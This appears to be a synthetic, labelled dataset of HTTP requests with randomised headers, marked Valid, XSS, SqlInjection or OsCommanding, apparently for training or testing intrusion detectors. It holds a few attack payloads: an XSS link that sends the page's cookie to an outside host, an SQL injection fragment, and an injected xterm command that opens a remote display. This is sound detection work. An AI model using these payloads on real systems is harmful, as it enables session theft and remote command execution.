If-Range: "WGpGUBokgpmvAHOQVt"
Max-Forwards: 5
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic dGpvZURvOnZmYXN1N20=
Range: 77-,76-
Referer: /ihI7r/sucAeGi/hiEdsm/i3xE.pl
TE: gzip;q=0.7,chunked;q=0.4,chunked
Trailer: Accept-Language
User-Agent: Mozilla/2.1 (X11; U; Open BSD i386 1.2; ea-rs; rv:0.4.2) Gecko/60969021
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3700x2595
Via: HTTP/3.4 93.235.5.1, FTP/1.7 98.235.59.17:416
Transfer-Encoding: sswea; nTSq=fynaeer
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 36.56.242.165
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38076
Start - Id: 204
class: Valid
GET /lrats0EitTjl/u7oaitdlnb/3W/l3pxVYRqFP1VsoTG/ioI3DuneqFsirre/ntbanh4hojr0vaP/doMay7yjK7vC3K/dbeoh0asrir0/itn.hhpEl6Ty02Br/P1mochaBKxML9G.css? HTTP/1.1
Host: www.raotqmtui.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: ftreeoli-dOzida;q=0.4
Cache-Control: no-cache
Client-ip: 79.196.181.198
Cookie: qemnoe7ttoebort=agqEkrdenngyaq;hdln9thn=?io4uprn;KkJCHG8Finsert=thtoe6o tea
Cookie2: $Version="60"
Date: Tue, 24 Apr 07 04:36:35 UTC
ETag: "3N3CXyaIZ5bDjbdk"
Expect: 100-continue
From: wnun9d@Ilphteim0h.ch
If-Modified-Since: Thu, 04 Oct 07 03:53:16 CET
If-Unmodified-Since: Fri, 27 Jan 06 24:07:52 GMT
If-Match: "vRLybVYFeToS1x9U"
If-None-Match: *
If-Range: Mon, 13 Aug 07 02:52:18 CET
Max-Forwards: 7
MIME-Version: 5.6
Pragma: ai='rnEeoq'
Proxy-Authorization: yghn ueizw2es=eeel
Authorization: NTLM bXIzTG9BYW1vR25lZXowZWVoaW1UcmVuYWlvdGg5b3RlbmVxcw==
Range: 534828-
Referer: http://www.ervnue6q.com/ckoe/j2tli/stmnh.pdf
TE: chunked;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (Windows; U; Win 9x 2.3; xy-gl; rv:6.5.9) Gecko/22561508
UA-CPU: StrongARM
UA-Disp: 021,047,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4314x599
Via: 5.6 www.eiZd.jpeg:9, 0.8 170.183.189.13, 1.7 187.204.101.158
Transfer-Encoding: gzip
Upgrade: Qte9/8.9, fuoe/5.0, efetmY/9.4, etlnke/8.4, nnb3rt/7.1
Warning: 087 www.ltOnotae.shtml:31935 "iiEllyneteg5u" "Thu, 28 May 09 07:54:06 GMT"
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 204
Start - Id: 24143
class: Valid
GET /btH7itjtoeafuarcv/yJ/hOUOBNx_X4/dledn5nrIiTR7m4otrWm/vcNgE/egeDhqbAsoxuidhraR/L.hqRnulliJ_I./aolytonaotosnsslet.jsp?8tlsxHEuC4P=534073&SrirTi=cmMhibevoie%25bn3ede HTTP/1.0
Host: www.eOPic4kchi.de:80726
Connection: OnrXi
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-stale=8
Client-ip: 115.135.92.236
Cookie: osmnnhciwc=caT3e;[0atiyso(gtcko ;H0xdaaj=&[
Cookie2: $Version="055"
Date: Sat, 25 Nov 06 12:23:33 GMT
ETag: "P7MkqcdNbD4qoZK"
Expect: 100-continue
From: hPtaiign@ejitme.cz
If-Modified-Since: Tue, 16 Jan 07 19:16:46 GMT
If-Unmodified-Since: Fri, 06 Apr 07 23:47:43 GMT
If-Match: "rEy_gMMPPw3SZtFJyiC"
If-None-Match: "l1rUi_be@xtQvyl"
If-Range: Thu, 28 Aug 08 18:34:04 CET
Max-Forwards: 9704
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM aG5oOGVMaGhQZWVoZWVlNlFlNWhkZzdlckQ5aW1sa29MYWRlMA==
Authorization: Basic dWllYU1vczpvaGVvVGVm
Range: 872-9,867-
Referer: /orbdwv/mnriR2i/7nemezo.js
TE: trailers
Trailer: Host
User-Agent: tQECstCFc http://www.etsi8s.uk
UA-CPU: MIPS
UA-Disp: 3355,078,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9598x0214
Via: 4.2 80.114.188.36
Transfer-Encoding: identity
Upgrade: eiii/0.5, 9ndue/3.8, tBtdt/3.0
Warning: 052 14.223.24.255 "0i0ndma" 
X-Forwarded-For: 79.231.86.228
X-Serial-Number: 14467935951
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24143
Start - Id: 10582
class: Valid
GET /tAo9vOKcjG/aBcqtujp/vwo5nlamHntsiosvo/VjMEYPLxcJr/odi1nmto7iysmhie/oF.c_u@mK79IkXDo/eepaSzr/ko3eye7eeorratt.shtml?Ju_tBtb=19&lmo=tCY_NJ6&dhsmu=snrg8te&ndtESoyemr=s&nrmlohzulTs=g%5C&hrl8mbh3hZt=seLbg HTTP/1.1
Host: 70.58.13.72
Connection: keep-alive
Accept: audio/basic;q=0.6, text/plain;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: min-fresh=81
Client-ip: 199.95.124.13
Cookie: sisvi9Uape5=rZX-dmnOV9;9cyae=oXwdmseitahosclZy;I6flike=ibAlnm4rLS;ga=i@etsock_stream
Cookie2: $Version="243"
Date: Wed, 09 Jul 08 07:57:40 GMT
ETag: W/"lOOiGyG8HGcYRzud"
Expect: raar
From: mohdrcal@8y7xh.de
If-Modified-Since: Sat, 27 Nov 04 10:41:51 UTC
If-Unmodified-Since: Sat, 20 Dec 08 15:05:15 CET
If-Match: "0cTIu_SDO4XOANDEr"
If-None-Match: "9Q_oQ.BeU@XE.dv"
If-Range: *
Max-Forwards: 82
MIME-Version: 6.8
Pragma: f='wi8qw'
Proxy-Authorization: Basic dU9vZGF4bGg6ZE9nc3I=
Authorization: Basic dXBvcmRuOmFzU2xhZA==
Range: 13113-277,3-670,8449-3
Referer: /oteeeo6m.gz
TE: trailers
Trailer: TE
User-Agent: riel4fs/1.5.2.5.7
UA-CPU: PowerPC
UA-Disp: 4066,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 170x2008
Via: HTTP/8.7 124.70.161.17:6975
Transfer-Encoding: deflate
Upgrade: Een/6.5, oelp/1.9, pepbl/8.4, hcTat/2.7, Uihj/0.1
Warning: 101 www.lSyoa.html "se09rYrre6" 
X-Forwarded-For: 109.176.189.188
X-Serial-Number: 340706
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10582
Start - Id: 18162
class: Valid
GET /4Eibc/thaetsutnnaRehgcnWtt/5rinfnnitE/hhh/dRX5K..Mgj_tQxU.jpg?lruotmiuKa6g=3079128&eiaratu=lFxtinnaeuteih&iqjowGdrfeJso9=%3Eselectgosanct6r&BqYg_tt71=6YnW-UCE&4riroaei=13954043&hto=+5i&saatcettgLx=40840&b-usr@l42Zi=i2eiD%3Fbdo+u0&airsa=a%3DaerucOu%5CRutupdatent%3C2b&gsnjftd=iz&RWQQ=+%3E+&ee=aan+ineadminlib2eeneastyle%5Dl&FUZ@wEa=99438&8etioe6hen=5437824 HTTP/1.1
Host: www.raee.be:80
Connection: keep-alive
Accept: application/rtf;q=0.1, audio/*, video/*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.6
Accept-Language: a4it-mst6
Cache-Control: min-fresh=10757
Client-ip: 187.103.207.94
Cookie: pm7atasaleg2=37
Cookie2: $Version="841"
Date: Mon, 25 Jul 05 22:38:11 UTC
ETag: W/"UI_Ukclehxlk_80C"
Expect: 100-continue
From: 96bse@Sia8e.it
If-Modified-Since: Thu, 04 Oct 07 07:14:17 CET
If-Unmodified-Since: Tue, 27 Mar 07 13:26:03 CET
If-Match: "POIQsV663Uozu-t"
If-None-Match: "Kb4VrEktA5D2bJK"
If-Range: "u7GM7tU8iGoO0rVQ"
Max-Forwards: 5
MIME-Version: 0.4
Pragma: ib8m=7eietww
Proxy-Authorization: Basic ZXJhaTJodGU6a3RTaQ==
Authorization: Digest nonce
Range: 875436-348852,-818
Referer: /eyd3es/aaodM/2gnHi.nsf
TE: deflate,gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: 7@vyen http://www.k6lao.fr
UA-CPU: MIPS
UA-Disp: 2033,9785,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: aoeten/1.4 www.eqzf.jpeg, rtnm/5.4 www.l3oE.jpg, 7.1 www.ki0oidyy.gif
Transfer-Encoding: neehae; no0nen=ATiwlds
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 963 216.51.91.254:266 "gatunof" "Thu, 18 May 06 14:03:37 CET"
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18162
Start - Id: 27554
class: Valid
GET /qkOetrs3evhao/qV78Hmail/eV@z37KHaJ7DxkhJM./ddsawidme5Io/znWx-7Z5/nial/zKn9NR5eC8/bg3/ffm5rKAvC/tNBformnDnrTallXIlH.tiff? HTTP/1.1
Host: www.injee.net
Connection: keep-alive
Accept: image/gif, text/*;q=0.9, image/jpeg
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *;q=0.7
Accept-Language: heeo-a3et1A
Cache-Control: no-transform
Client-ip: 43.118.104.43
Cookie: etljx=3a7UmmtbOL;n6errjs=copye;en=aZ1O-xnJwnd;GLLN02A=76382;ruoavc9btpt1bw=npe;H1A0fl=eiaana >uip0dmner ne
Cookie2: $Version="6"
Date: Sat, 26 Aug 06 24:55:06 CET
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Sun, 26 Jun 05 08:09:05 GMT
If-Unmodified-Since: Sat, 12 Jul 08 07:27:12 GMT
If-Match: "@iFMmWiAbJlEpgwxLsk"
If-None-Match: *
If-Range: Mon, 31 May 04 01:20:46 CET
Max-Forwards: 9
MIME-Version: 2.1
Pragma: eyreea='xgroei'
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: Digest opaque="lesn"
Range: 12108-0448,63541-,88678-33
Referer: /xTowjw/5onof/hstrzu/eptsra/henDeeo.jsp
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/1.5 (X11; U; Linux i586 3.3; sa-t7; rv:6.2.3) Gecko/76107228
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: 3.4 207.140.34.199
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 039 www.arkr.tiff:90 "Gazauhqtpdrsdhhh" "Sat, 20 Feb 10 16:03:50 GMT"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27554
Start - Id: 4429
class: Valid
PUT /tZ/aseamf9mTwt/eoewhleqe2/mAD_W9hkBAM-cv8/m3e9Go/eFd.cfm? HTTP/1.1
Content-Length: 186
Content-Language: jpTgd,ef,srtisole
Content-Encoding: compress
Content-Location: /enerfm3.php4
Content-MD5: RXhzeWNlOXB6c2FlM2JmZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 20:05:22 CET
Last-Modified: Mon, 08 Jun 09 05:40:37 CET
Host: www.8a2gtth.net
Connection: ccHe
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: N='llsiosoa'
Client-ip: 30.242.53.46
Cookie: snsG=18802348;grmrn2dossths3n=sf;otdtptsrb0aihp=g0b oe;cttYs=89;HX8hG=85&gon dnhoehl;-v.tD4Y=cchild
Cookie2: $Version="91"
Date: Sun, 21 Sep 08 05:02:52 CET
ETag: "Gmpo2_GvpsQPDAy"
Expect: 100-continue
From: tOtyah@r88dwnoa.st
If-Modified-Since: Sun, 27 Mar 05 03:28:42 UTC
If-Unmodified-Since: Mon, 05 Jan 04 07:25:48 UTC
If-Match: "hMMdvwJjDwuZY@eYp"
If-None-Match: *
If-Range: *
Max-Forwards: 16
MIME-Version: 6.8
Pragma: fERa=odxEejs
Proxy-Authorization: NTLM SGkyc0Rvc2V0cjhmZTBZc2d5ZTdmMWlicm9kNWx4Z2g=
Authorization: eose EjV1=ri3gcit
Range: 0-,20077-,-023590
Referer: http://www.aylaema.com/oxoda6r/0adcB.asp
TE: gzip,deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: esaaa (fP1Pdz1U; oI3sal2v3p; eFh2-CrF; eTFv1Pbh8; gDEwKK)
UA-CPU: Sparc
UA-Disp: 3339,068,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6849x3464
Via: 9.1 www.oekv.jpg
Transfer-Encoding: gzip
Upgrade: aw7qe/7.0, Owgd/5.7
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 237.166.142.123
X-Serial-Number: 763591863096384767
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bHo=rzvdrT&aYEoairrd=3&eOs31sgitntmr=Adr(t&rrsoonneieTsrR=5209907&alwOr6yIagl=389064&eteoi=ane&mrei6aZmdh7P=fnib&EL9l=368096&urcg7icu=5i8&elcsenNeVfp3=ePtP@&q.5b=binaesrki&wmi0yeg=45

End - Id: 4429
Start - Id: 1969
class: Valid
GET /era8rfttfatof9l/anxetnn4t/fXfb5bBia8Q.shtml?r5rttnla4=783&tit4=esaec%7Epositionrgoh&dacaa=3&pEgaoA6Znene=%7Contaatytpe%27&8ndieiu=nit+vE&peXZwps.sC=osttlose&p6bew=46&sIhbsysio6sy8bi=686175&4-PsXL9A23Q=04&aylyyg1mansx7U=ehene2ww+ySec&oaoodsa=281706108&EI7suynnpftt=vRi&pnsate=5377684&eoldzuYesmsc3am=objecte&orexceru1ops=%29oetj HTTP/1.1
Host: 128.45.2.39
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: piboi-eiebsis;q=0.4, eoagaone-rOn
Cache-Control: max-stale=758
Client-ip: 13.36.44.80
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="75"
Date: Fri, 17 Aug 07 05:05:39 GMT
ETag: W/"plLBmnTpaJzgnQ."
Expect: 100-continue
From: ntlbbxru@destaueare.gov
If-Modified-Since: Tue, 27 Jun 06 06:34:41 CET
If-Unmodified-Since: Sat, 24 Feb 07 08:16:03 GMT
If-Match: "tHJ7qOFoPZqW8_dB7"
If-None-Match: *
If-Range: Mon, 27 Oct 08 06:50:31 GMT
Max-Forwards: 6
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: NTLM ZXJzUXRlYWZuanMwcmNtbGR0ckg5bXRpYkVsb2Q2c2FuZW5haDl0dHZ0V3lwczc=
Range: 907906-,4755-184
Referer: /i6sea.tar
TE: trailers
Trailer: Date
User-Agent: Mozilla/4.3 (Windows; U; WinNT 8.6; ia-te; rv:8.0.6) Gecko/45992645
UA-CPU: MIPS
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 396x457
Via: 8.9 www.dtaydd.css
Transfer-Encoding: identity
Upgrade: uhe/2.1, fhfev3/6.7, nebdfl/5.2
Warning: 712 www.hdnE.htm:2 "fofsmh" "Fri, 22 Aug 08 05:32:13 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 189729230
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1969
Start - Id: 24511
class: Valid
GET /tzTc9K2o8g8WpJe/xuahm9OTts9eetepGmS/0ibposerojtu/iJwv@1DMW7XnOhwSeKe/cKw6bU3XtwrHMt-IT/YHuLZ7D4aO_1unioniK/btI75i7d@FB0.sh?e98vwu=tmO75xmlw4ts&ttlO51t=n2&ehrb=9666806&aaern6tedkeas=cr%7Ccu&9cse8lmnb=mayrbkrp&Ic0k3IcG@63i=nca5locationrftNd+c4&xeLerm=nd%3Dehormsa&EwzbD7@=1&pmnf=0592899&Etrnoiireot=passthrugroup+bybedls&2MIqEN-B=l%2Blink+x4iA%7Cfi&depntanhw=SOrou+beet&lxyes3rgj=410220&0sniUmn3e=irEa3XqHW_ HTTP/1.0
Host: 103.40.168.193
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-japanese;q=0.6, windows-1250;q=0.7, shift_jis;q=0.4, windows-1250;q=0.0, utf-7;q=0.9
Accept-Encoding: 
Accept-Language: 4-1aehsf;q=0.4, LAcr5-eo, ip-taoeXir
Cache-Control: max-age=64770
Client-ip: 213.202.71.157
Cookie: NWXM=eXs7hQ;5rrcnrcOsroDmt=gQI;lbm9=45;acceptuvP3il=465cpps;whereuvSB=3
Cookie2: $Version="305"
Date: Wed, 29 Aug 07 12:20:56 CET
ETag: "S4zTUrwjKvccHcU7"
Expect: ksotAer
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Thu, 10 Jul 08 01:31:37 CET
If-Unmodified-Since: Sat, 22 May 04 22:49:55 UTC
If-Match: "t43dBvnv17ly7kDyx"
If-None-Match: "dyMPaz_Dugh39UUup"
If-Range: "KevFAFy07Rx67Uh3NeP"
Max-Forwards: 932
MIME-Version: 3.9
Pragma: EdqOt=iuMen
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: 8rpibn chitji=jtwhghc
Range: -1,-897
Referer: /5nsaUc/Fbhhi.dll
TE: trailers,deflate,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/1.1 (Windows; U; Win98 5.3; 5p-lo; rv:0.5.0) Gecko/42650957
UA-CPU: PowerPC
UA-Disp: 9148,760,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0451x999
Via: vEhtA/0.1 36.41.70.57
Transfer-Encoding: gzip
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 566 www.Xphrezsp.htm "njtsn" "Sat, 25 Mar 06 03:51:16 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 24511
Start - Id: 47323
class: XSS
GET /cmdIwOTd/tXj/mdETTMqAuDtpj0E/0cNmU4y-m.ErAN_yxCa/aPjwz/_XUvtxwinnt2wq/d170i/otat6ih/2WjpQ1VcAxb.htm?usr@1scriptJyIN=53&eissiua=accept1&oStL2EeallQoeH=urlocationn5&taogac=ni&at=N2&r9feutmsh7hadn=y&smd=957524&nodea07=7pr&yaiaeAocu=0&fbetween9UqMfGvEN=%3Clink+++++rel+++%3D+++%22+++stylesheet++%22++++href+++%3D++++%22+++++javascript%3A++++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.nt.com%2Fcgi-bin%2Frora.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++++%3E&skWiacltmnaif0=%25vard HTTP/1.1
Host: www.saiyqgccN3.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: taIeue2='gmi'
Client-ip: 68.164.101.129
Cookie: eoylsphtgorn=swois-i9ai6l;teasItrob2in4tS= nss  tp8luj~Lo;Ylelt=uwieTt0group bynf%;Nek1nnde=37144345;M2ott5jsoooot=473472;hotb2ld=9e
Cookie2: $Version="7"
Date: Sun, 13 Feb 05 05:45:51 UTC
ETag: W/"@-3igXFzz.XbYHw@rM"
Expect: 100-continue
From: ueasrS@d1jogree.it
If-Modified-Since: Sat, 13 Aug 05 10:14:53 GMT
If-Unmodified-Since: Tue, 12 Apr 05 21:02:59 UTC
If-Match: *
If-None-Match: *
If-Range: ".cVulEasZLCbaDOpF"
Max-Forwards: 14
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic ZXNwZXRmOnNldGUxb2Jv
Range: -827060,69-,229-399617
Referer: http://www.tinet.it/aacnSso2/s8ihebe/chcg/nudotva/oaru4je.gif
TE: chunked;q=0.5
Trailer: If-Match
User-Agent: 0rrc (ov0Gbvn-; aEGm1_dlJN; t8E@tw)
UA-CPU: 68000
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5306x1733
Via: FTP/0.4 243.52.213.208, ewo/8.5 www.aosetyt.html
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47323
Start - Id: 41415
class: SqlInjection
POST /dL/tpqyRttstcedr/7ATtnru/eUhomeDbinpdTdr0F/7e41aD9odsp9on/jSCC9catNMEU-/kFVp.pugpJ.sHDXqc/ann/hemdanu0rae0rumr/v0_dAEr.asp? HTTP/1.1
Content-Length: 81
Content-Language: e2ettx
Content-Encoding: deflate
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: aWRlaXVvcm0wMjFlc3IyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Nov 04 11:23:00 GMT
Last-Modified: Thu, 22 Nov 07 12:32:05 GMT
Host: 104.12.185.6
Connection: bieaOaco
Accept: */*;q=0.2
Accept-Charset: windows-1252;q=0.5
Accept-Encoding: 
Accept-Language: iaaa-esr4xh;q=0.4, DtnqrIt-e;q=0.9, 5gt-si;q=0.9, sqr-s5so;q=0.6, u57rd82e-maTeqn
Cache-Control: no-cache
Client-ip: 180.8.150.200
Cookie: rm9djuteoeatt=nAnr3xc;iih65rwyttTy=7ttrr|;ewgr=79873673;utmoimixr6dC6ts=r 3x;gtrSlyg=axvJH;idEa7Ia5dsaek=1830638
Cookie2: $Version="20"
Date: Sat, 19 Nov 05 11:50:57 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: oghl
From: cTensp@smyerSeiti.st
If-Modified-Since: Wed, 12 Nov 08 18:53:54 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: "d-pyYyZhtOUr6rzkfU9G"
If-None-Match: *
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 12
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic ZWgybWxvUDoxb3ljb3RsZA==
Range: 24-
Referer: http://eayrct.net/6wyexr/renea/egioet/a8hhysl.css
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: epgIioe/3.2.3.8
UA-CPU: MIPS
UA-Disp: 016,9117,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 738x118
Via: 1.4 www.thuScr.css:9, 9.7 0.189.119.128
Transfer-Encoding: identity
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 19164
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nbtDa=2283173942&vAiArpoas=aebIsEhms&sock_stream@bptY-8Ivexec=OR     6>29091387

End - Id: 41415
Start - Id: 15708
class: Valid
GET /JM@sxp_RovgT/o8mmfVxcMOfs_7/h5rth.asmx?Eei4harDnccc=9vfbvP4f3x&b4ewfNEbEshNst=5usrh&qbe5seaot8efees=+37t&yrAdarioit=rVrey1a5Iepnttep&-q5nvTtmpyscript=Odjn&n1eLsmyiurEmE=4tch2c&i3hhtpass7=betweenatlink HTTP/1.0
Host: www.sotq7o.de
Connection: close
Accept: */*;q=0.6
Accept-Charset: koi8-r, iso-2022-kr;q=0.3, cp-932
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 136.105.214.240
Cookie: mgqd6yih= qk6whereu;tbtPjheZp3=scriptz4aemochag7epSEsystemEe
Cookie2: $Version="81"
Date: Wed, 04 Nov 09 07:18:39 CET
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Wed, 28 May 08 10:50:27 GMT
If-Unmodified-Since: Tue, 09 Mar 04 24:49:54 UTC
If-Match: "6kkE2s@G.rKsfnq5S"
If-None-Match: "79tYyoyJ1Zp1QC8OiGw9"
If-Range: "tYbu04esHxTOGlbH0mTK"
Max-Forwards: 2
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: NTLM OUU2MW91TmVjd2V0dHN5bnJzdGhvaHJobmltcGlycnp1
Range: -2
Referer: http://o59l.com/5hht8to/ae6e/cotEte/e8uduIa/wdha6w.nsf
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: ee2rhettTr (4MOxopykl; tUvyVzVej; cv-Y@0; bKSLWG3t7; eGVv-CIU1)
UA-CPU: MIPS
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: FTP/3.4 249.83.18.65
Transfer-Encoding: oEEkus
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 932 www.rnd3y6t.html "sooEn8itisTrOtziidm" 
X-Forwarded-For: 139.13.197.94
X-Serial-Number: 9307845835407773
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15708
Start - Id: 43283
class: OsCommanding
GET /chtpassT4bbPx@62y/qN3Dm7DhJVBu8F_.shtml?aetti0clc=tCjBVVYJp&--Xy6PHS8=%5Cr++xterm++++-display++135.67.93.87%3A0.0 HTTP/1.0
Host: 71.73.142.116:80
Connection: etc82
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: etrak-siossWt0, 6T-qarj4eua, f-ca;q=0.7
Cache-Control: ng=ico95H
Client-ip: 86.210.157.25
Cookie: adstaij5ov=2122835;r5tEeuxphq2=7;49rmelat=11742413
Cookie2: $Version="414"
Date: Thu, 12 Jun 08 19:12:43 UTC
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 15 Jun 08 02:35:55 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 92
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: http://www.dMtt.it/Mztrgudn/ilftu1hv/gie8gDOn/Ssaa1f.cgi
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 2.0; yf-0c; rv:1.3.6) Gecko/62709571
UA-CPU: PowerPC
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/0.2 101.232.26.216
Transfer-Encoding: identity
Upgrade: apais/4.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43283
Start - Id: 393
class: Valid
GET /eRvlt7_A5r1SV_vBL/OTMxeCTRhX/dreamoo7atedeHo8zs1n/bCCvQK-/tTt/tettbmef8t.swf? HTTP/1.0
Host: www.e5llonw58g.uk
Connection: tnnlJrta
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: wbo-arhssj;q=0.3, aoIuh-df1tar, ea5r-oog
Cache-Control: no-transform
Client-ip: 80.119.213.130
Cookie: h0must1a9utettE=967;mcDX.11V4=329;aangOixbW8m2e=7727397;voetdas=yxOdter d
Cookie2: $Version="619"
Date: Thu, 06 Oct 05 09:17:14 CET
ETag: "SzKAw69SM.gLSN@v"
Expect: 100-continue
From: mery8@lusi.gov
If-Modified-Since: Thu, 28 Feb 08 23:18:23 UTC
If-Unmodified-Since: Fri, 29 Aug 08 14:39:22 CET
If-Match: "PHx_aFUk5Db_t1OCvIB"
